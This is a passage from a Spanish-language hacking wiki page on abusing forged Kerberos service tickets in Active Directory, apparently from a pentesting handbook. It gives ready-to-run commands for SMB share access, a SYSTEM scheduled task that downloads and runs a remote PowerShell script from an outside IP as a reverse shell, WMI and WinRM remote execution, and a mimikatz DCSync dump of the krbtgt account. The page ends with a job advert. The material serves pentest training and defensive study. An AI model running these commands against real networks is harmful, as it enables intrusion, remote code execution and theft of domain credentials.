HOST
RPCSS
| | PowerShell Remoting |HOST
HTTP
Dependiendo del sistema operativo también:
WSMAN
RPCSS
| | WinRM |HOST
HTTP
En algunas ocasiones puedes simplemente solicitar: WINRM
| | Tareas programadas | HOST | | Compartir archivos de Windows, también psexec | CIFS | | Operaciones LDAP, incluido DCSync | LDAP | | Herramientas de administración remota del servidor de Windows |RPCSS
LDAP
CIFS
| | Tickets de oro | krbtgt | Usando **Rubeus**, puedes **solicitar todos** estos tickets utilizando el parámetro: * `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm` ## Abuso de tickets de servicio En los siguientes ejemplos, imaginemos que el ticket se obtiene suplantando la cuenta de administrador. ### CIFS Con este ticket podrás acceder a las carpetas `C$` y `ADMIN$` a través de **SMB** (si están expuestas) y copiar archivos a una parte del sistema de archivos remoto simplemente haciendo algo como: ```bash dir \\vulnerable.computer\C$ dir \\vulnerable.computer\ADMIN$ copy afile.txt \\vulnerable.computer\C$\Windows\Temp ``` También podrás obtener una shell dentro del host o ejecutar comandos arbitrarios utilizando **psexec**: {% content-ref url="../ntlm/psexec-and-winexec.md" %} [psexec-and-winexec.md](../ntlm/psexec-and-winexec.md) {% endcontent-ref %} ### HOST Con este permiso podrás generar tareas programadas en computadoras remotas y ejecutar comandos arbitrarios: ```bash #Check you have permissions to use schtasks over a remote server schtasks /S some.vuln.pc #Create scheduled task, first for exe execution, second for powershell reverse shell download schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe" schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'" #Check it was successfully created schtasks /query /S some.vuln.pc #Run created schtask now schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName" ``` ### HOST + RPCSS Con estos tickets puedes **ejecutar WMI en el sistema víctima**: ```bash #Check you have enough privileges Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local #Execute code Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand" #You can also use wmic wmic remote.computer.local list full /format:list ``` Encuentra más información sobre wmiexec en la siguiente página: {% content-ref url="../ntlm/wmicexec.md" %} [wmicexec.md](../ntlm/wmicexec.md) {% endcontent-ref %} ### HOST + WSMAN (WINRM) Con acceso winrm a una computadora, puedes **acceder a ella** e incluso obtener un PowerShell: ```bash New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC ``` Consulta la siguiente página para aprender **más formas de conectarse a un host remoto utilizando winrm**: {% content-ref url="../ntlm/winrm.md" %} [winrm.md](../ntlm/winrm.md) {% endcontent-ref %} {% hint style="warning" %} Ten en cuenta que **winrm debe estar activo y escuchando** en la computadora remota para acceder a ella. {% endhint %} ### LDAP Con este privilegio puedes volcar la base de datos del controlador de dominio utilizando **DCSync**: ``` mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt ``` **Aprende más sobre DCSync** en la siguiente página: {% content-ref url="dcsync.md" %} [dcsync.md](dcsync.md) {% endcontent-ref %} Si estás interesado en una **carrera de hacking** y hackear lo imposible - **¡estamos contratando!** (_se requiere fluidez en polaco, tanto escrito como hablado_). {% embed url="https://www.stmcyber.com/careers" %}